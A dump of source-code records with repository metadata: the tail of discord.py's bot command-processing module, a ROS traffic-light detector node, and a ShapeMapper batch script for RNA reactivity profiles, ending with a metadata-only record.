however, **always** called regardless of the internal command callback raising an error (i.e. :exc:`.CommandInvokeError`\). This makes it ideal for clean-up scenarios. Parameters ----------- coro: :ref:`coroutine <coroutine>` The coroutine to register as the post-invoke hook. Raises ------- TypeError The coroutine passed is not actually a coroutine. """ if not asyncio.iscoroutinefunction(coro): raise TypeError('The post-invoke hook must be a coroutine.') self._after_invoke = coro return coro # listener registration def add_listener(self, func, name=None): """The non decorator alternative to :meth:`.listen`. Parameters ----------- func: :ref:`coroutine <coroutine>` The function to call. name: Optional[:class:`str`] The name of the event to listen for. Defaults to ``func.__name__``. Example -------- .. code-block:: python3 async def on_ready(): pass async def my_message(message): pass bot.add_listener(on_ready) bot.add_listener(my_message, 'on_message') """ name = func.__name__ if name is None else name if not asyncio.iscoroutinefunction(func): raise TypeError('Listeners must be coroutines') if name in self.extra_events: self.extra_events[name].append(func) else: self.extra_events[name] = [func] def remove_listener(self, func, name=None): """Removes a listener from the pool of listeners. Parameters ----------- func The function that was used as a listener to remove. name: :class:`str` The name of the event we want to remove. Defaults to ``func.__name__``. """ name = func.__name__ if name is None else name if name in self.extra_events: try: self.extra_events[name].remove(func) except ValueError: pass def listen(self, name=None): """A decorator that registers another function as an external event listener. Basically this allows you to listen to multiple events from different places e.g. such as :func:`.on_ready` The functions being listened to must be a :ref:`coroutine <coroutine>`. Example -------- .. code-block:: python3 @bot.listen() async def on_message(message): print('one') # in some other file... @bot.listen('on_message') async def my_message(message): print('two') Would print one and two in an unspecified order. Raises ------- TypeError The function being listened to is not a coroutine. """ def decorator(func): self.add_listener(func, name) return func return decorator # cogs def add_cog(self, cog: Cog, *, override: bool = False) -> None: """Adds a "cog" to the bot. A cog is a class that has its own event listeners and commands. .. versionchanged:: 2.0 :exc:`.ClientException` is raised when a cog with the same name is already loaded. Parameters ----------- cog: :class:`.Cog` The cog to register to the bot. override: :class:`bool` If a previously loaded cog with the same name should be ejected instead of raising an error. .. versionadded:: 2.0 Raises ------- TypeError The cog does not inherit from :class:`.Cog`. CommandError An error happened during loading. .ClientException A cog with the same name is already loaded. """ if not isinstance(cog, Cog): raise TypeError('cogs must derive from Cog') cog_name = cog.__cog_name__ existing = self.__cogs.get(cog_name) if existing is not None: if not override: raise discord.ClientException(f'Cog named {cog_name!r} already loaded') self.remove_cog(cog_name) cog = cog._inject(self) self.__cogs[cog_name] = cog def get_cog(self, name): """Gets the cog instance requested. If the cog is not found, ``None`` is returned instead. Parameters ----------- name: :class:`str` The name of the cog you are requesting. This is equivalent to the name passed via keyword argument in class creation or the class name if unspecified. Returns -------- Optional[:class:`Cog`] The cog that was requested. If not found, returns ``None``. """ return self.__cogs.get(name) def remove_cog(self, name): """Removes a cog from the bot. All registered commands and event listeners that the cog has registered will be removed as well. If no cog is found then this method has no effect. Parameters ----------- name: :class:`str` The name of the cog to remove. """ cog = self.__cogs.pop(name, None) if cog is None: return help_command = self._help_command if help_command and help_command.cog is cog: help_command.cog = None cog._eject(self) @property def cogs(self): """Mapping[:class:`str`, :class:`Cog`]: A read-only mapping of cog name to cog.""" return types.MappingProxyType(self.__cogs) # extensions def _remove_module_references(self, name): # find all references to the module # remove the cogs registered from the module for cogname, cog in self.__cogs.copy().items(): if _is_submodule(name, cog.__module__): self.remove_cog(cogname) # remove all the commands from the module for cmd in self.all_commands.copy().values(): if cmd.module is not None and _is_submodule(name, cmd.module): if isinstance(cmd, GroupMixin): cmd.recursively_remove_all_commands() self.remove_command(cmd.name) # remove all the listeners from the module for event_list in self.extra_events.copy().values(): remove = [] for index, event in enumerate(event_list): if event.__module__ is not None and _is_submodule(name, event.__module__): remove.append(index) for index in reversed(remove): del event_list[index] def _call_module_finalizers(self, lib, key): try: func = getattr(lib, 'teardown') except AttributeError: pass else: try: func(self) except Exception: pass finally: self.__extensions.pop(key, None) sys.modules.pop(key, None) name = lib.__name__ for module in list(sys.modules.keys()): if _is_submodule(name, module): del sys.modules[module] def _load_from_module_spec(self, spec, key): # precondition: key not in self.__extensions lib = importlib.util.module_from_spec(spec) sys.modules[key] = lib try: spec.loader.exec_module(lib) except Exception as e: del sys.modules[key] raise errors.ExtensionFailed(key, e) from e try: setup = getattr(lib, 'setup') except AttributeError: del sys.modules[key] raise errors.NoEntryPointError(key) try: setup(self) except Exception as e: del sys.modules[key] self._remove_module_references(lib.__name__) self._call_module_finalizers(lib, key) raise errors.ExtensionFailed(key, e) from e else: self.__extensions[key] = lib def _resolve_name(self, name, package): try: return importlib.util.resolve_name(name, package) except ImportError: raise errors.ExtensionNotFound(name) def load_extension(self, name, *, package=None): """Loads an extension. An extension is a python module that contains commands, cogs, or listeners. An extension must have a global function, ``setup`` defined as the entry point on what to do when the extension is loaded. This entry point must have a single argument, the ``bot``. Parameters ------------ name: :class:`str` The extension name to load. It must be dot separated like regular Python imports if accessing a sub-module. e.g. ``foo.test`` if you want to import ``foo/test.py``. package: Optional[:class:`str`] The package name to resolve relative imports with. This is required when loading an extension using a relative path, e.g ``.foo.test``. Defaults to ``None``. .. versionadded:: 1.7 Raises -------- ExtensionNotFound The extension could not be imported. This is also raised if the name of the extension could not be resolved using the provided ``package`` parameter. ExtensionAlreadyLoaded The extension is already loaded. NoEntryPointError The extension does not have a setup function. ExtensionFailed The extension or its setup function had an execution error. """ name = self._resolve_name(name, package) if name in self.__extensions: raise errors.ExtensionAlreadyLoaded(name) spec = importlib.util.find_spec(name) if spec is None: raise errors.ExtensionNotFound(name) self._load_from_module_spec(spec, name) def unload_extension(self, name, *, package=None): """Unloads an extension. When the extension is unloaded, all commands, listeners, and cogs are removed from the bot and the module is un-imported. The extension can provide an optional global function, ``teardown``, to do miscellaneous clean-up if necessary. This function takes a single parameter, the ``bot``, similar to ``setup`` from :meth:`~.Bot.load_extension`. Parameters ------------ name: :class:`str` The extension name to unload. It must be dot separated like regular Python imports if accessing a sub-module. e.g. ``foo.test`` if you want to import ``foo/test.py``. package: Optional[:class:`str`] The package name to resolve relative imports with. This is required when unloading an extension using a relative path, e.g ``.foo.test``. Defaults to ``None``. .. versionadded:: 1.7 Raises ------- ExtensionNotFound The name of the extension could not be resolved using the provided ``package`` parameter. ExtensionNotLoaded The extension was not loaded. """ name = self._resolve_name(name, package) lib = self.__extensions.get(name) if lib is None: raise errors.ExtensionNotLoaded(name) self._remove_module_references(lib.__name__) self._call_module_finalizers(lib, name) def reload_extension(self, name, *, package=None): """Atomically reloads an extension. This replaces the extension with the same extension, only refreshed. This is equivalent to a :meth:`unload_extension` followed by a :meth:`load_extension` except done in an atomic way. That is, if an operation fails mid-reload then the bot will roll-back to the prior working state. Parameters ------------ name: :class:`str` The extension name to reload. It must be dot separated like regular Python imports if accessing a sub-module. e.g. ``foo.test`` if you want to import ``foo/test.py``. package: Optional[:class:`str`] The package name to resolve relative imports with. This is required when reloading an extension using a relative path, e.g ``.foo.test``. Defaults to ``None``. .. versionadded:: 1.7 Raises ------- ExtensionNotLoaded The extension was not loaded. ExtensionNotFound The extension could not be imported. This is also raised if the name of the extension could not be resolved using the provided ``package`` parameter. NoEntryPointError The extension does not have a setup function. ExtensionFailed The extension setup function had an execution error. """ name = self._resolve_name(name, package) lib = self.__extensions.get(name) if lib is None: raise errors.ExtensionNotLoaded(name) # get the previous module states from sys modules modules = { name: module for name, module in sys.modules.items() if _is_submodule(lib.__name__, name) } try: # Unload and then load the module... self._remove_module_references(lib.__name__) self._call_module_finalizers(lib, name) self.load_extension(name) except Exception: # if the load failed, the remnants should have been # cleaned from the load_extension function call # so let's load it from our old compiled library. lib.setup(self) self.__extensions[name] = lib # revert sys.modules back to normal and raise back to caller sys.modules.update(modules) raise @property def extensions(self): """Mapping[:class:`str`, :class:`py:types.ModuleType`]: A read-only mapping of extension name to extension.""" return types.MappingProxyType(self.__extensions) # help command stuff @property def help_command(self): return self._help_command @help_command.setter def help_command(self, value): if value is not None: if not isinstance(value, HelpCommand): raise TypeError('help_command must be a subclass of HelpCommand') if self._help_command is not None: self._help_command._remove_from_bot(self) self._help_command = value value._add_to_bot(self) elif self._help_command is not None: self._help_command._remove_from_bot(self) self._help_command = None else: self._help_command = None # command processing async def get_prefix(self, message): """|coro| Retrieves the prefix the bot is listening to with the message as a context. Parameters ----------- message: :class:`discord.Message` The message context to get the prefix of. Returns -------- Union[List[:class:`str`], :class:`str`] A list of prefixes or a single prefix that the bot is listening for. """ prefix = ret = self.command_prefix if callable(prefix): ret = await discord.utils.maybe_coroutine(prefix, self, message) if not isinstance(ret, str): try: ret = list(ret) except TypeError: # It's possible that a generator raised this exception. Don't # replace it with our own error if that's the case. if isinstance(ret, collections.abc.Iterable): raise raise TypeError("command_prefix must be plain string, iterable of strings, or callable " f"returning either of these, not {ret.__class__.__name__}") if not ret: raise ValueError("Iterable command_prefix must contain at least one prefix") return ret async def get_context(self, message, *, cls=Context): r"""|coro| Returns the invocation context from the message. This is a more low-level counter-part for :meth:`.process_commands` to allow users more fine grained control over the processing. The returned context is not guaranteed to be a valid invocation context, :attr:`.Context.valid` must be checked to make sure it is. If the context is not valid then it is not a valid candidate to be invoked under :meth:`~.Bot.invoke`. Parameters ----------- message: :class:`discord.Message` The message to get the invocation context from. cls The factory class that will be used to create the context. By default, this is :class:`.Context`. Should a custom class be provided, it must be similar enough to :class:`.Context`\'s interface. Returns -------- :class:`.Context` The invocation context. The type of this can change via the ``cls`` parameter. """ view = StringView(message.content) ctx = cls(prefix=None, view=view, bot=self, message=message) if message.author.id == self.user.id: return ctx prefix = await self.get_prefix(message) invoked_prefix = prefix if isinstance(prefix, str): if not view.skip_string(prefix): return ctx else: try: # if the context class' __init__ consumes something from the view this # will be wrong. That seems unreasonable though. if message.content.startswith(tuple(prefix)): invoked_prefix = discord.utils.find(view.skip_string, prefix) else: return ctx except TypeError: if not isinstance(prefix, list): raise TypeError("get_prefix must return either a string or a list of string, " f"not {prefix.__class__.__name__}") # It's possible a bad command_prefix got us here. for value in prefix: if not isinstance(value, str): raise TypeError("Iterable command_prefix or list returned from get_prefix must " f"contain only strings, not {value.__class__.__name__}") # Getting here shouldn't happen raise if self.strip_after_prefix: view.skip_ws() invoker = view.get_word() ctx.invoked_with = invoker ctx.prefix = invoked_prefix ctx.command = self.all_commands.get(invoker) return ctx async def invoke(self, ctx): """|coro| Invokes the command given under the invocation context and handles all the internal event dispatch mechanisms. Parameters ----------- ctx: :class:`.Context` The invocation context to invoke. """ if ctx.command is not None: self.dispatch('command', ctx) try: if await self.can_run(ctx, call_once=True): await ctx.command.invoke(ctx) else: raise errors.CheckFailure('The global check once functions failed.') except errors.CommandError as exc: await ctx.command.dispatch_error(ctx, exc) else: self.dispatch('command_completion', ctx) elif ctx.invoked_with: exc = errors.CommandNotFound(f'Command "{ctx.invoked_with}" is not found') self.dispatch('command_error', ctx, exc) async def process_commands(self, message): """|coro| This function processes the commands that have been registered to the bot and other groups. Without this coroutine, none of the commands will be triggered. By default, this coroutine is called inside the :func:`.on_message` event. If you choose to override the :func:`.on_message` event, then you should invoke this coroutine as well. This is built using other low level tools, and is equivalent to a call to :meth:`~.Bot.get_context` followed by a call to :meth:`~.Bot.invoke`. This also checks if the message's author is a bot and doesn't call :meth:`~.Bot.get_context` or :meth:`~.Bot.invoke` if so. Parameters ----------- message: :class:`discord.Message` The message to process commands for. """ if message.author.bot: return ctx = await self.get_context(message) await self.invoke(ctx) async def on_message(self, message): await self.process_commands(message) class Bot(BotBase, discord.Client): """Represents a discord bot. This class is a subclass of :class:`discord.Client` and as a result anything that you can do with a :class:`discord.Client` you can do with this bot. This class also subclasses :class:`.GroupMixin` to provide the functionality to manage commands. Attributes ----------- command_prefix The command prefix is what the message content must contain initially to have a command invoked. This prefix could either be a string to indicate what the prefix should be, or a callable that takes in the bot as its first parameter and :class:`discord.Message` as its second parameter and returns the prefix. This is to facilitate "dynamic" command prefixes. This callable can be either a regular function or a coroutine. An empty string as the prefix always matches, enabling prefix-less command invocation. While this may be useful in DMs it should be avoided in servers, as it's likely to cause performance issues and unintended command invocations. The command prefix could also be an iterable of strings indicating that multiple checks for the prefix should be used and the first one to match will be the invocation prefix. You can get this prefix via :attr:`.Context.prefix`. To avoid confusion empty iterables are not allowed. .. note:: When passing multiple prefixes be careful to not pass a prefix that matches a longer prefix occurring later in the sequence. For example, if the command prefix is ``('!', '!?')`` the ``'!?'`` prefix will never be matched to any message as the previous one matches messages starting with ``!?``. This is especially important when passing an empty string, it should always be last as no prefix after it will be matched. case_insensitive: :class:`bool` Whether the commands should be case insensitive. Defaults to ``False``. This attribute does not carry over to groups. You must set it to every group if you require group commands to be case insensitive as well. description: :class:`str` The content prefixed into the default help message. help_command: Optional[:class:`.HelpCommand`] The help command implementation to use. This can be dynamically set at runtime. To remove the help command pass ``None``. For more information on implementing a help command, see :ref:`ext_commands_help_command`. owner_id: Optional[:class:`int`] The user ID that owns the bot. If this is not set and is then queried via :meth:`.is_owner` then it is fetched automatically using :meth:`~.Bot.application_info`. owner_ids: Optional[Collection[:class:`int`]] The user IDs that owns the bot. This is similar to :attr:`owner_id`. If this is not set and the application is team based, then it is fetched automatically using :meth:`~.Bot.application_info`. For performance reasons it is recommended to use a :class:`set` for the collection. You cannot set both ``owner_id`` and ``owner_ids``. .. versionadded:: 1.3 strip_after_prefix: :class:`bool` Whether to strip whitespace characters after encountering the command prefix. This allows for ``! hello`` and ``!hello`` to both work if the ``command_prefix`` is set to ``!``. Defaults to ``False``. .. versionadded:: 1.7 """ pass class AutoShardedBot(BotBase, discord.AutoShardedClient): """This is similar to :class:`.Bot` except that it is inherited from :class:`discord.AutoShardedClient` instead. """ pass
34.321594
118
0.604245
a4a89712613ffd58bba52e5e6019655b39976691
6,330
py
Python
ros/src/tl_detector/tl_detector.py
AlexanderKim/CarND-Capstone
99d7fb010bba961fe5f9416b6232e9904b8b691d
[ "MIT" ]
null
null
null
ros/src/tl_detector/tl_detector.py
AlexanderKim/CarND-Capstone
99d7fb010bba961fe5f9416b6232e9904b8b691d
[ "MIT" ]
null
null
null
ros/src/tl_detector/tl_detector.py
AlexanderKim/CarND-Capstone
99d7fb010bba961fe5f9416b6232e9904b8b691d
[ "MIT" ]
null
null
null
#!/usr/bin/env python import rospy from std_msgs.msg import Int32 from geometry_msgs.msg import PoseStamped, Pose from styx_msgs.msg import TrafficLightArray, TrafficLight from styx_msgs.msg import Lane from sensor_msgs.msg import Image from cv_bridge import CvBridge from light_classification.tl_classifier import TLClassifier import tf import cv2 import yaml from scipy.spatial import KDTree STATE_COUNT_THRESHOLD = 3 class TLDetector(object): def __init__(self): rospy.init_node('tl_detector') self.pose = None self.waypoints = None self.camera_image = None self.lights = [] self.waypoints_2d = None self.waypoint_tree = None sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb) sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb) ''' /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and helps you acquire an accurate ground truth data source for the traffic light classifier by sending the current color state of all traffic lights in the simulator. When testing on the vehicle, the color state will not be available. You'll need to rely on the position of the light and the camera image to predict it. ''' sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb) sub6 = rospy.Subscriber('/image_color', Image, self.image_cb) config_string = rospy.get_param("/traffic_light_config") self.config = yaml.load(config_string) self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1) self.bridge = CvBridge() self.light_classifier = TLClassifier() self.listener = tf.TransformListener() self.state = TrafficLight.UNKNOWN self.last_state = TrafficLight.UNKNOWN self.last_wp = -1 self.state_count = 0 rospy.spin() def pose_cb(self, msg): self.pose = msg def waypoints_cb(self, waypoints): self.waypoints = waypoints if not self.waypoints_2d: self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoints.waypoints] self.waypoint_tree = KDTree(self.waypoints_2d) def traffic_cb(self, msg): self.lights = msg.lights def image_cb(self, msg): """Identifies red lights in the incoming camera image and publishes the index of the waypoint closest to the red light's stop line to /traffic_waypoint Args: msg (Image): image from car-mounted camera """ self.has_image = True self.camera_image = msg light_wp, state = self.process_traffic_lights() ''' Publish upcoming red lights at camera frequency. Each predicted state has to occur `STATE_COUNT_THRESHOLD` number of times till we start using it. Otherwise the previous stable state is used. ''' if self.state != state: self.state_count = 0 self.state = state elif self.state_count >= STATE_COUNT_THRESHOLD: self.last_state = self.state light_wp = light_wp if state == TrafficLight.RED else -1 self.last_wp = light_wp self.upcoming_red_light_pub.publish(Int32(light_wp)) else: self.upcoming_red_light_pub.publish(Int32(self.last_wp)) self.state_count += 1 # def get_closest_waypoint(self, pose): def get_closest_waypoint(self, x, y): """Identifies the closest path waypoint to the given position https://en.wikipedia.org/wiki/Closest_pair_of_points_problem Args: pose (Pose): position to match a waypoint to Returns: int: index of the closest waypoint in self.waypoints """ #TODO implement closest_idx = self.waypoint_tree.query([x, y], 1)[1] return closest_idx def get_light_state(self, light): """Determines the current color of the traffic light Args: light (TrafficLight): light to classify Returns: int: ID of traffic light color (specified in styx_msgs/TrafficLight) """ if(not self.has_image): self.prev_light_loc = None return False # cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, "bgr8") cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, "rgb8") #Get classification return self.light_classifier.get_classification(cv_image) def process_traffic_lights(self): """Finds closest visible traffic light, if one exists, and determines its location and color Returns: int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists) int: ID of traffic light color (specified in styx_msgs/TrafficLight) """ # light = None closest_light = None line_wp_idx = None # List of positions that correspond to the line to stop in front of for a given intersection stop_line_positions = self.config['stop_line_positions'] if(self.pose): # car_position = self.get_closest_waypoint(self.pose.pose) car_wp_idx = self.get_closest_waypoint(self.pose.pose.position.x, self.pose.pose.position.y) #TODO find the closest visible traffic light (if one exists) diff = len(self.waypoints.waypoints) for i, light in enumerate(self.lights): line = stop_line_positions[i] temp_wp_idx = self.get_closest_waypoint(line[0], line[1]) d = temp_wp_idx - car_wp_idx if d >=0 and d < diff: diff = d closest_light = light line_wp_idx = temp_wp_idx if closest_light: state = self.get_light_state(closest_light) return line_wp_idx, state # self.waypoints = None return -1, TrafficLight.UNKNOWN if __name__ == '__main__': try: TLDetector() except rospy.ROSInterruptException: rospy.logerr('Could not start traffic node.')
34.78022
132
0.646445
501bea0132eb447a696bd18bf9755ba4442090c0
7,734
py
Python
Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py
zhangqf-lab/RIP-icSHAPE-MaP
435cc8c8d5c2a662edb6371fd228174b3edd996f
[ "MIT" ]
3
2021-06-11T14:17:04.000Z
2021-12-20T16:20:20.000Z
Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py
zhangqf-lab/RIP-icSHAPE-MaP
435cc8c8d5c2a662edb6371fd228174b3edd996f
[ "MIT" ]
null
null
null
Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py
zhangqf-lab/RIP-icSHAPE-MaP
435cc8c8d5c2a662edb6371fd228174b3edd996f
[ "MIT" ]
null
null
null
##### Run lpd lpdir envpy3 first import subprocess import threading import os def get_pairs(): pairs = [] pairs.append( [ 'NAI_100mm_vivo_CIRL_SSII', 'DMSO_CIRL_SSII', 'DC_CIRL_SSII' ] ) pairs.append( [ 'NAI_100mm_vitro_CIRL_SSII', 'DMSO_CIRL_SSII', 'DC_CIRL_SSII' ] ) pairs.append( [ 'NAI_100mm_vivo_SMR_SSII_repX', 'DMSO_SMR_SSII_repX', 'DC_SMR_SSII_repX' ] ) pairs.append( [ 'NAI_100mm_vitro_SMR_SSII_repX', 'DMSO_SMR_SSII_repX', 'DC_SMR_SSII_repX' ] ) pairs.append( [ 'NAI_200mm_vitro_SMR_BENR_SSII', 'DMSO_SMR_BENR_SSII' ] ) pairs.append( [ 'NAI_100mm_vitro_SMR_CENR_SSII', 'DMSO_SMR_BENR_SSII' ] ) pairs.append( [ 'NAI_100mm_vitro_SMR_BENR_SSII', 'DMSO_SMR_BENR_SSII' ] ) pairs.append( [ 'NAI_50mm_exvivo_dicer_1_CIRL_CENR_SSII_repX', 'DMSO_dicer_1_CIRL_BENR_SSII_repX', 'DC_dicer_CIRL_CENR_SSII_repX' ] ) pairs.append( [ 'NAI_50mm_exvivo_dicer_2_CIRL_CENR_SSII_repX', 'DMSO_dicer_2_CIRL_BENR_SSII_repX', 'DC_dicer_CIRL_CENR_SSII_repX' ] ) pairs.append( [ 'NAI_100mm_vivo_CIRL_CENR_SSII_repX', 'DMSO_CIRL_BENR_SSII', 'DC_CIRL_CENR_SSII' ] ) pairs.append( [ 'NAI_100mm_vivo_CIRL_TGIII', 'DMSO_CIRL_TGIII', 'DC_CIRL_TGIII' ] ) pairs.append( [ 'NAI_100mm_vitro_CIRL_TGIII', 'DMSO_CIRL_TGIII', 'DC_CIRL_TGIII' ] ) pairs.append( [ 'NAI_100mm_vitro_CIRL_CENR_SSII_repX', 'DMSO_CIRL_BENR_SSII', 'DC_CIRL_CENR_SSII' ] ) pairs.append( [ 'NAI_100mm_vitro_SMR_TGIII', 'DMSO_SMR_TGIII' ] ) pairs.append( [ 'NAI_200mm_vitro_SMR_TGIII', 'DMSO_SMR_TGIII' ] ) opt = {} for triplet in pairs: opt[ triplet[0] ] = { 'DMSO':triplet[1], 'DC':None } if len(triplet) == 3: opt[ triplet[0] ][ 'DC' ] = triplet[2] return opt def format_pairs(file_list): opt = get_pairs() construct_pairs = [] NAI_samples = [ file for file in file_list if file.startswith("NAI") ] for NAI_file in NAI_samples: necfiles = opt[NAI_file] if necfiles['DMSO'] in file_list: if necfiles['DC'] in file_list: construct_pairs.append( [necfiles['DMSO'], NAI_file, necfiles['DC']] ) else: construct_pairs.append( [necfiles['DMSO'], NAI_file] ) return construct_pairs def load_fasta(seqFn, rem_tVersion=False): Fasta = {} cur_tid = '' for line in open(seqFn): if line[0] == '>': cur_tid = line[1:].split()[0] if rem_tVersion and '.' in cur_tid: cur_tid = ".".join(cur_tid.split(".")[:-1]) Fasta[ cur_tid ] = '' else: Fasta[ cur_tid ] += line.strip() return Fasta class MakeReacProfClass(threading.Thread): def __init__(self, inDir, outDir, seqFn, folderList, file_filter=None, mindepth=5000, maxbg=0.05, steps_to_run=[1,2,3]): threading.Thread.__init__(self) self.inDir = inDir self.outDir = outDir self.seqFn = seqFn self.folderList = folderList[:] self.file_filter = set(file_filter[:]) self.mindepth = mindepth self.maxbg = maxbg self.steps_to_run = steps_to_run[:] def run(self): inDir = self.inDir.rstrip('/') + '/' outDir = self.outDir.rstrip('/') + '/' sequence = load_fasta(self.seqFn) cmd1 = "shapemapper_mutation_counter -i %s -s -c %s -n %s 2>/dev/null 1>/dev/null" cmd2 = "make_reactivity_profiles.py --fa %s --rna %s --counts %s --out %s --mindepth %s --maxbg %s 2>/dev/null 1>/dev/null" cmd3 = "normalize_profiles.py --disable-end3 --tonorm %s 1>/dev/null" #inputFolders = os.listdir(inDir) for folder_name in self.folderList: print("Run "+folder_name) rna_name = folder_name tLen = len(sequence[rna_name]) oFolder = outDir + folder_name if not os.path.isdir(inDir+folder_name): continue if not os.path.exists(oFolder): os.mkdir(oFolder) inputFiles = os.listdir(inDir+folder_name) if self.file_filter: inputFiles = set(inputFiles) & self.file_filter if 1 in self.steps_to_run: for iFile in inputFiles: inFile_full = inDir+folder_name+"/"+iFile outFile_full = oFolder + "/" + iFile command = cmd1 % (inFile_full, outFile_full, tLen) output = subprocess.getoutput(command) if 2 in self.steps_to_run or 3 in self.steps_to_run: con_pairs = format_pairs(inputFiles) for pair in con_pairs: dmso_full = oFolder + "/" + pair[0] nai_full = oFolder + "/" + pair[1] #if len(pair) == 3: # dc_full = oFolder + "/" + pair[2] #else: # dc_full = "" dc_full = "" outSHAPEfull = oFolder + "/" + pair[1] + ".shape" if 2 in self.steps_to_run: command = cmd2 % (seqFn, rna_name, nai_full+" "+dmso_full+" "+dc_full, outSHAPEfull, self.mindepth, self.maxbg) output = subprocess.getoutput(command) if 3 in self.steps_to_run: command = cmd3 % (outSHAPEfull, ) output = subprocess.getoutput(command) if "NormError" in output: print("==>filter "+outSHAPEfull) os.remove(outSHAPEfull) else: print("==>Success "+outSHAPEfull) def batch_collect_mutations(inDir, outDir, seqFn, nproc=1, file_filter=None, mindepth=5000, maxbg=0.05, steps_to_run=[1,2,3]): import subprocess, math import _thread import time import random inputFolders = os.listdir(inDir) random.shuffle(inputFolders) if 'rRNA_human_5S' in inputFolders: inputFolders.remove('rRNA_human_5S') inputFolders.insert(0, 'rRNA_human_5S') if 'error' in inputFolders: inputFolders.remove('error') N_forEachProc = math.ceil(len(inputFolders) / nproc) print("Number for each process: "+str(N_forEachProc)) Folders_Lists = [] i = 0 while i < len(inputFolders): Folders_Lists.append( inputFolders[i:i+N_forEachProc] ) i += N_forEachProc thred_list = [] for folder_list in Folders_Lists: thread = MakeReacProfClass(inDir, outDir, seqFn, folder_list, file_filter, mindepth, maxbg, steps_to_run) thred_list.append( thread ) print("Number of threads list: "+str(len(thred_list))) for thread in thred_list: thread.start() for thread in thred_list: thread.join() inDir = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/5.split_mutation" outDir = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/6.shapemapper" seqFn = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/ref/yeast.uniq.fa" file_filter = ['REP1', 'REP2'] batch_collect_mutations(inDir, outDir, seqFn, nproc=20, file_filter=file_filter, mindepth=1000, maxbg=0.05, steps_to_run=[1])
44.194286
142
0.569822
f5b1e7289f9bfbeac72dd18eb335bde902363ab9
1,756
py
Python
setup.py
MrRutledge/pypastry
59104ee8e882e75d33fe7bab60f03c353516eb8a
[ "MIT" ]
1
2019-11-13T11:12:18.000Z
2019-11-13T11:12:18.000Z
setup.py
MrRutledge/pypastry
59104ee8e882e75d33fe7bab60f03c353516eb8a
[ "MIT" ]
null
null
null
setup.py
MrRutledge/pypastry
59104ee8e882e75d33fe7bab60f03c353516eb8a
[ "MIT" ]
null
null
null
import sys from setuptools import setup, find_packages #check to make sure the python version is compatible if sys.version_info < (3, 6): sys.exit('Sorry, PyPastry requires Python version 3.6 or greater') # Reading in the ReadMe file as the doc file with open("README.md", "r") as fh: long_description = fh.read() setup( name='pypastry', version='0.2.1', description='PyPastry machine learning experimentation framework', author='Daoud Clarke', url='https://github.com/datapastry/pypastry', scripts=['pastry'], install_requires=['tomlkit', 'pandas', 'scikit-learn', 'pyarrow', 'gitpython', 'pytest'], #To find the packages packages=find_packages(), #To read in data file modules py_modules=['data/pie'], # commands that can be run in a console in the commands folder entry_points={ 'console_scripts': [ 'init = pypastry.commands.init:run', 'print = pypastry.commands.print_:run', 'run = pypastry.commands.run:run' ]}, package_data={ '' : ['data/*.gitignore'], # And include any *.gitignore files found in the 'data' package, too: 'data': ['*.gitignore'], }, long_description=long_description, long_description_content_type='text/markdown', # Make the setup file aware of the Manifest file include_package_data=True, #Minimum requirement of python, licesnse, and operating system. classifiers=[ "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent"], python_requires='>=3.5', )
33.769231
93
0.6418
6e766104bdac6ddc8195ddbc96f49804fd7c3a2e
751
py
Python
Mundo 2/ex059.py
sandenbergmelo/ExerciciosPython
049958801823b1b9b23b0e80f6f1bcf8cd272efe
[ "MIT" ]
1
2021-05-12T18:44:11.000Z
2021-05-12T18:44:11.000Z
Mundo 2/ex059.py
sandenbergmelo/ExerciciosPython
049958801823b1b9b23b0e80f6f1bcf8cd272efe
[ "MIT" ]
null
null
null
Mundo 2/ex059.py
sandenbergmelo/ExerciciosPython
049958801823b1b9b23b0e80f6f1bcf8cd272efe
[ "MIT" ]
null
null
null
n1 = int(input('Primeiro valor: ')) n2 = int(input('Segundo valor: ')) opcao = 0 while opcao != 5: print(''' [ 1 ] Somar [ 2 ] Multiplicar [ 3 ] Maior [ 4 ] Novos números [ 5 ] Sair do programa''') opcao = int(input('Opção: ')) if opcao == 1: soma = n1 + n2 print(f'\n\n{n1} + {n2} = {soma}\n\n') elif opcao == 2: produto = n1 * n2 print(f'\n\n{n1} x {n2} = {produto}\n\n') elif opcao == 3: maior = max(n1, n2) menor = min(n1, n2) print(f'\n\n{maior} é maior que {menor}\n\n') elif opcao == 4: print('Novos números: ') n1 = int(input('Primeiro valor: ')) n2 = int(input('Segundo valor: ')) elif opcao == 5: print('Fim do programa') else: print('Opção inválida') print('=-=' * 10) else: print('Fim do programa')
22.088235
47
0.569907
cdbbee64d37a04d2ec606caad18f1e913aaa5736
4,628
py
Python
vdpwi/data.py
achyudh/castor
d7a02ce03f2b71ef1fa490122dd4bbc8214b8b19
[ "Apache-2.0" ]
132
2017-04-02T12:31:55.000Z
2019-03-09T07:53:29.000Z
vdpwi/data.py
sudipta90/castor
fa2f59535c71a0fb4586afbe543b81ba812c8630
[ "Apache-2.0" ]
111
2017-04-01T23:00:24.000Z
2019-03-10T08:29:20.000Z
vdpwi/data.py
sudipta90/castor
fa2f59535c71a0fb4586afbe543b81ba812c8630
[ "Apache-2.0" ]
53
2017-04-06T01:17:18.000Z
2019-02-27T03:10:35.000Z
